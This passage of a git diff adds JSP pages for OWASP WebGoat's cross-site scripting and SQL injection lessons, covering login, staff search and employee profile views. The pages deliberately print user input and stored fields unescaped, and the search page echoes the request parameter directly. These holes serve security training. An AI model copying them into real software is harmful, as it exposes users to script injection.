+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=CrossSiteScripting.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=CrossSiteScripting.LISTSTAFF_ACTION%>"/>
+						</form></td>
+					<% 
+					}
+					%>			
+		             <td width="50">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), CrossSiteScripting.EDITPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=CrossSiteScripting.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=CrossSiteScripting.EDITPROFILE_ACTION%>"/>
+						</form>
+					<% 
+					}
+					%>			
+					</td>
+                    <td width="60">
+					<%
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), CrossSiteScripting.DELETEPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=CrossSiteScripting.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=CrossSiteScripting.DELETEPROFILE_ACTION%>"/>
+						</form>
+					<% 
+					}
+					%>
+					</td>
+                      <td width="190">&nbsp;</td>
+                      <td width="76">
+						<form method="POST">
+							<input type="submit" name="action" value="<%=CrossSiteScripting.LOGOUT_ACTION%>"/>
+						</form>
+					</td>
+				</tr>
+         	</table>
+		</div>
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/error.jsp b/main/project/WebContent/lessons/CrossSiteScripting/error.jsp
new file mode 100644
index 000000000..5af0a45dc
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/error.jsp
@@ -0,0 +1,3 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	errorPage="" %>
+<br><br><br>An error has occurred.
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg
new file mode 100644
index 000000000..39e1ed80d
Binary files /dev/null and b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg differ
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_header.jpg b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_header.jpg
new file mode 100644
index 000000000..60a809af0
Binary files /dev/null and b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_header.jpg differ
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg
new file mode 100644
index 000000000..c91f8a052
Binary files /dev/null and b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg differ
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_menu.jpg b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_menu.jpg
new file mode 100644
index 000000000..2c9512571
Binary files /dev/null and b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_menu.jpg differ
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_workspace.jpg b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_workspace.jpg
new file mode 100644
index 000000000..292d25654
Binary files /dev/null and b/main/project/WebContent/lessons/CrossSiteScripting/images/lesson1_workspace.jpg differ
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css b/main/project/WebContent/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css
new file mode 100755
index 000000000..8ffcd6a7e
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/DBCrossSiteScripting.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/CrossSiteScripting/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/CrossSiteScripting/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp b/main/project/WebContent/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp
new file mode 100755
index 000000000..7d6ec61e0
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/DBCrossSiteScripting.jsp
@@ -0,0 +1,26 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" 
+	errorPage="" %>
+<style>
+<jsp:include page="DBCrossSiteScripting.css" />
+</style>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+DBCrossSiteScripting currentLesson = (DBCrossSiteScripting) webSession.getCurrentLesson();
+%>
+<div id="lesson_wrapper">
+	<div id="lesson_header"></div>
+	<div class="lesson_workspace">
+	<%
+	String subViewPage = currentLesson.getPage(webSession);
+	if (subViewPage != null)
+	{
+		//System.out.println("Including sub view page: " + subViewPage);
+	%>
+	<jsp:include page="<%=subViewPage%>" />
+	<%
+	}
+	%>
+
+	</div>
+</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/EditProfile.jsp b/main/project/WebContent/lessons/DBCrossSiteScripting/EditProfile.jsp
new file mode 100755
index 000000000..42f5f08e1
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/EditProfile.jsp
@@ -0,0 +1,134 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("DBCrossSiteScripting.Employee");
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.FIRST_NAME%>" type="text" value="<%=employee.getFirstName()%>"/>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<input class="lesson_text_db" name="<%=DBCrossSiteScripting.LAST_NAME%>" type="text" value="<%=employee.getLastName()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.ADDRESS1%>" type="text" value="<%=employee.getAddress1()%>"/>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.ADDRESS2%>" type="text" value="<%=employee.getAddress2()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.PHONE_NUMBER%>" type="text" value="<%=employee.getPhoneNumber()%>"/>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.START_DATE%>" type="text" value="<%=employee.getStartDate()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<input class="lesson_text_db" name="<%=DBCrossSiteScripting.SSN%>" type="text" value="<%=employee.getSsn()%>"/> 
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.SALARY%>" type="text" value="<%=employee.getSalary()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.CCN%>" type="text" value="<%=employee.getCcn()%>"/>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.CCN_LIMIT%>" type="text" value="<%=employee.getCcnLimit()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.DESCRIPTION%>" type="text" value="<%=employee.getPersonalDescription()%>"/>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<select class="lesson_text_db" name="<%=DBCrossSiteScripting.MANAGER%>">
+						<%
+				      	List employees = (List) session.getAttribute("DBCrossSiteScripting.Staff");
+				      	Iterator i = employees.iterator();
+						while (i.hasNext())
+						{
+							EmployeeStub stub = (EmployeeStub) i.next();
+								%>
+								<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()%></option>
+						<%}%>
+						</select>
+					</TD>	
+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<textarea name="<%=DBCrossSiteScripting.DISCIPLINARY_NOTES%>" cols="16" rows="3" class="lesson_text_db" ><%=employee.getDisciplinaryActionNotes()%></textarea>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBCrossSiteScripting.DISCIPLINARY_DATE%>" type="text" value="<%=employee.getDisciplinaryActionDate()%>"/>
+					</TD>
+				</TR>
+				</Table>
+				<BR>
+				<div class="lesson_buttons_bottom">
+				<table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+               		<tr>
+                     		<td width="57">
+							<input type="submit" name="action" value="<%=DBCrossSiteScripting.VIEWPROFILE_ACTION%>"/>
+				  		</td>
+				  		
+                       	<td width="81">
+ 							<input name="<%=DBCrossSiteScripting.EMPLOYEE_ID%>" type="hidden" value="<%=employee.getId()%>">
+							<input name="<%=DBCrossSiteScripting.TITLE%>" type="hidden" value="<%=employee.getTitle()%>">
+							<input type="submit" name="action" value="<%=DBCrossSiteScripting.UPDATEPROFILE_ACTION%>"/>
+						</td>
+                        	<td width="211"></td>
+                        	<td width="83">
+	 						<input type="submit" name="action" value="<%=DBCrossSiteScripting.LOGOUT_ACTION%>"/>
+						</td>
+                 	</tr>
+              	</table>
+              	</div>
+			</form>
+		</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/ListStaff.jsp b/main/project/WebContent/lessons/DBCrossSiteScripting/ListStaff.jsp
new file mode 100755
index 000000000..60c963f11
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/ListStaff.jsp
@@ -0,0 +1,54 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	int myUserId = webSession.getUserIdInLesson();
+%>
+	<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Staff Listing Page</div>
+		<br>
+		<br>
+		<br>
+		<p>Select from the list below	</p>
+		<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+  <table width="60%" border="0" cellpadding="3">
+    <tr>
+      <td>  <label>
+  <select name="<%=DBCrossSiteScripting.EMPLOYEE_ID%>" size="11">
+			      	<%
+			      	List employees = (List) session.getAttribute("DBCrossSiteScripting." + DBCrossSiteScripting.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();%>
+						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
+					}%>
+  </select>
+  </label></td>
+      <td>
+	        	<input type="submit" name="action" value="<%=DBCrossSiteScripting.SEARCHSTAFF_ACTION%>"/><br>
+	        	<input type="submit" name="action" value="<%=DBCrossSiteScripting.VIEWPROFILE_ACTION%>"/><br>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, DBCrossSiteScripting.CREATEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=DBCrossSiteScripting.CREATEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, DBCrossSiteScripting.DELETEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=DBCrossSiteScripting.DELETEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+			<br>
+					<input type="submit" name="action" value="<%=DBCrossSiteScripting.LOGOUT_ACTION%>"/>
+	  </td>
+    </tr>
+  </table>
+
+		</form>
+		
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/Login.jsp b/main/project/WebContent/lessons/DBCrossSiteScripting/Login.jsp
new file mode 100755
index 000000000..9daefd1b6
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" 
+	errorPage="" %>
+	<div id="lesson_login">
+		<div id="lesson_login_txt">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>
+			      	<select name="<%=DBCrossSiteScripting.EMPLOYEE_ID%>">
+			      	<%
+			      	//System.out.println("Retrieving employees list");
+			      	List employees = (List) session.getAttribute("DBCrossSiteScripting." + DBCrossSiteScripting.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();
+					%>
+			      	<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName() + " (" + stub.getRole() + ")"%></option>
+					<%}%>
+	                </select>
+		        </label>
+				<br>
+			    	<label>Password
+			    		<input name="password" type="password" size="10" maxlength="8" />
+			    </label>
+				<br>
+				<input type="submit" name="action" value="<%=DBCrossSiteScripting.LOGIN_ACTION%>"/>
+			</form>
+		</div>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/SearchStaff.jsp b/main/project/WebContent/lessons/DBCrossSiteScripting/SearchStaff.jsp
new file mode 100755
index 000000000..ddc5519b5
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/SearchStaff.jsp
@@ -0,0 +1,22 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" 
+	errorPage="" %>
+	<div id="lesson_search">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			String searchedName = request.getParameter(DBCrossSiteScripting.SEARCHNAME);
+			if (searchedName != null)
+			{
+			%>
+				Employee <%=searchedName%> not found.
+			<%
+			}
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>Name
+					<input class="lesson_text_db" type="text" name="<%=DBCrossSiteScripting.SEARCHNAME%>"/>
+		        </label>
+				<br>
+				<input type="submit" name="action" value="<%=DBCrossSiteScripting.FINDPROFILE_ACTION%>"/>
+			</form>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/ViewProfile.jsp b/main/project/WebContent/lessons/DBCrossSiteScripting/ViewProfile.jsp
new file mode 100755
index 000000000..ce0fee2b2
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/ViewProfile.jsp
@@ -0,0 +1,151 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBCrossSiteScripting.DBCrossSiteScripting" errorPage="" %>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("DBCrossSiteScripting." + DBCrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY);
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<%=employee.getFirstName()%>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<%=employee.getLastName()%>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<%=employee.getAddress1()%>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<%=employee.getAddress2()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<%=employee.getPhoneNumber()%>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<%=employee.getStartDate()%>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<%=employee.getSsn()%>
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<%=employee.getSalary()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<%=employee.getCcn()%>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<%=employee.getCcnLimit()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<%=employee.getPersonalDescription()%>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<%=employee.getManager()%>
+					</TD>	
+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionNotes()%>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionDate()%>
+					</TD>
+				</TR>
+				</Table>
+		</div>
+		<div class="lesson_buttons_bottom">
+		    <table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+                 <tr>
+                 	<td width="50">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBCrossSiteScripting.LISTSTAFF_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=DBCrossSiteScripting.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=DBCrossSiteScripting.LISTSTAFF_ACTION%>"/>
+						</form></td>
+					<% 
+					}
+					%>			
+		             <td width="50">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBCrossSiteScripting.EDITPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=DBCrossSiteScripting.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=DBCrossSiteScripting.EDITPROFILE_ACTION%>"/>
+						</form>
+					<% 
+					}
+					%>			
+					</td>
+                    <td width="60">
+					<%
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), DBCrossSiteScripting.DELETEPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=DBCrossSiteScripting.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=DBCrossSiteScripting.DELETEPROFILE_ACTION%>"/>
+						</form>
+					<% 
+					}
+					%>
+					</td>
+                      <td width="190">&nbsp;</td>
+                      <td width="76">
+						<form method="POST">
+							<input type="submit" name="action" value="<%=DBCrossSiteScripting.LOGOUT_ACTION%>"/>
+						</form>
+					</td>
+				</tr>
+         	</table>
+		</div>
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/error.jsp b/main/project/WebContent/lessons/DBCrossSiteScripting/error.jsp
new file mode 100755
index 000000000..5af0a45dc
--- /dev/null
+++ b/main/project/WebContent/lessons/DBCrossSiteScripting/error.jsp
@@ -0,0 +1,3 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	errorPage="" %>
+<br><br><br>An error has occurred.
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg
new file mode 100755
index 000000000..39e1ed80d
Binary files /dev/null and b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_SearchWindow.jpg differ
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_header.jpg b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_header.jpg
new file mode 100755
index 000000000..60a809af0
Binary files /dev/null and b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_header.jpg differ
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg
new file mode 100755
index 000000000..c91f8a052
Binary files /dev/null and b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_loginWindow.jpg differ
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg
new file mode 100755
index 000000000..2c9512571
Binary files /dev/null and b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_menu.jpg differ
diff --git a/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg
new file mode 100755
index 000000000..292d25654
Binary files /dev/null and b/main/project/WebContent/lessons/DBCrossSiteScripting/images/lesson1_workspace.jpg differ
diff --git a/main/project/WebContent/lessons/DBSQLInjection/DBSQLInjection.css b/main/project/WebContent/lessons/DBSQLInjection/DBSQLInjection.css
new file mode 100755
index 000000000..b0b84331b
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/DBSQLInjection.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/main/project/WebContent/lessons/DBSQLInjection/DBSQLInjection.jsp b/main/project/WebContent/lessons/DBSQLInjection/DBSQLInjection.jsp
new file mode 100755
index 000000000..7bf2fc250
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/DBSQLInjection.jsp
@@ -0,0 +1,26 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" 
+	errorPage="" %>
+<style>
+<jsp:include page="DBSQLInjection.css" />
+</style>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+DBSQLInjection currentLesson = (DBSQLInjection) webSession.getCurrentLesson();
+%>
+<div id="lesson_wrapper">
+	<div id="lesson_header"></div>
+	<div class="lesson_workspace">
+	<%
+	String subViewPage = currentLesson.getPage(webSession);
+	if (subViewPage != null)
+	{
+		//System.out.println("Including sub view page: " + subViewPage);
+	%>
+	<jsp:include page="<%=subViewPage%>" />
+	<%
+	}
+	%>
+
+	</div>
+</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/DBSQLInjection/EditProfile.jsp b/main/project/WebContent/lessons/DBSQLInjection/EditProfile.jsp
new file mode 100755
index 000000000..55c7dc673
--- /dev/null
+++ b/main/project/WebContent/lessons/DBSQLInjection/EditProfile.jsp
@@ -0,0 +1,133 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.DBSQLInjection.DBSQLInjection" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("DBDBSQLInjection.Employee");
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.FIRST_NAME%>" type="text" value="<%=employee.getFirstName()%>"/>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<input class="lesson_text_db" name="<%=DBSQLInjection.LAST_NAME%>" type="text" value="<%=employee.getLastName()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.ADDRESS1%>" type="text" value="<%=employee.getAddress1()%>"/>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.ADDRESS2%>" type="text" value="<%=employee.getAddress2()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.PHONE_NUMBER%>" type="text" value="<%=employee.getPhoneNumber()%>"/>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.START_DATE%>" type="text" value="<%=employee.getStartDate()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<input class="lesson_text_db" name="<%=DBSQLInjection.SSN%>" type="text" value="<%=employee.getSsn()%>"/> 
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.SALARY%>" type="text" value="<%=employee.getSalary()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.CCN%>" type="text" value="<%=employee.getCcn()%>"/>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.CCN_LIMIT%>" type="text" value="<%=employee.getCcnLimit()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=DBSQLInjection.DESCRIPTION%>" type="text" value="<%=employee.getPersonalDescription()%>"/>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<select class="lesson_text_db" name="<%=DBSQLInjection.MANAGER%>">
+						<%
+				      	List employees = (List) session.getAttribute("DBSQLInjection.Staff");
+				      	Iterator i = employees.iterator();
+						while (i.hasNext())
+						{
+							EmployeeStub stub = (EmployeeStub) i.next();
+								%>
+								<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()%></option>
+						<%}%>
+						</select>
+					</TD>	
